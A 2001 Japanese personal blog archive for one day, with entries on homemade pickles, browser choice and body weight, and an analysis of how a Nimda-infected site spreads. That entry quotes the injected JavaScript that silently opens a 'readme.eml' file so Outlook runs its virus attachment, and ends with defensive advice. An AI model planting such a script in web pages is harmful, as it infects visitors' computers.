日別アーカイブ: 2001/09/23

日記9/23の3

昨日漬けた松前漬けを食ってみる。
…ん!ちゃんと松前漬けだ(笑)。でも日本酒を入れすぎたようで少々酒くさい。まあでも許容範囲。このヌルヌル感がたまらん?。まだスルメとコンブはたくさんあるので次回は酒を少な目にしてみりんを多めにしてみる。
ちゃんと作れることがわかったので、カズノコでも買ってくっかねぇ。でもそうすると出来合いのを買うのとコストがあまり変わらないかもしれない。安くたくさん食べるのが目的だからそれはヤメにしよう。

日記9/23の2

というわけでワタシはOutlookなぞ使っていないので、IEに戻すことにしました。本当はネスケ使いたいんだけど、実は最近はネスケの方が不安定だったりするし、それに行間が狭すぎて見にくいのよネスケは…。
本日の体重:78.2kg

日記9/23

Yahooのニュースを見てたらNimda感染サイトの情報があったので、興味本位に見てみました(笑)。HP見ただけで感染するというのがどのような手段か見たかったのね。もちろんネスケで。
私はてっきりActiveXを使ってるんだと思ったんですが、テキもさるもの。
こんなJavascriptが。
<script language=”JavaScript”>
window.open(“readme.eml”, null, “resizable=no,top=6000,left=6000”)
</script>
拡張子emlはメールの書式にのっとったテキストファイルです。まずこれを開いています。ダウンロードしてみたところ、添付ファイルがあります。それがウィルス本体の実行ファイルでしょう。拡張子emlに対応しているのは通常メーラーですから、メーラーが起動します。Outlookの場合、添付ファイルを勝手に実行する機能がありやがりますので、見事感染します。
…よくできてる…。ActiveXならセキュリティレベルいぢればダウンロード、実行はしないけれど、普通Javascriptまで切る人はいませんからねぇ(最近はJavascriptとCookie要求されるサイト多いし)。まあ添付ファイルを勝手に実行しちまうのはOutlook(Express)くらいですからIEとOutlookの組み合わせ以外では「知らないうちに感染」はありえませんけど…。
上記は既に感染しているサイトでしたが、この添付ファイルを実行してしまうと今度は自分のコンピュータから他のコンピュータに攻撃を加えることになってしまいます。
ま、一番確実な防衛手段は「IEとOutlook使わない」ですな(笑)。せめてOutlookをやめれば添付ファイルを勝手に実行することはなくなります。元よりOutlookは重いし使いたいとは思いませんが…(自分はBecky)。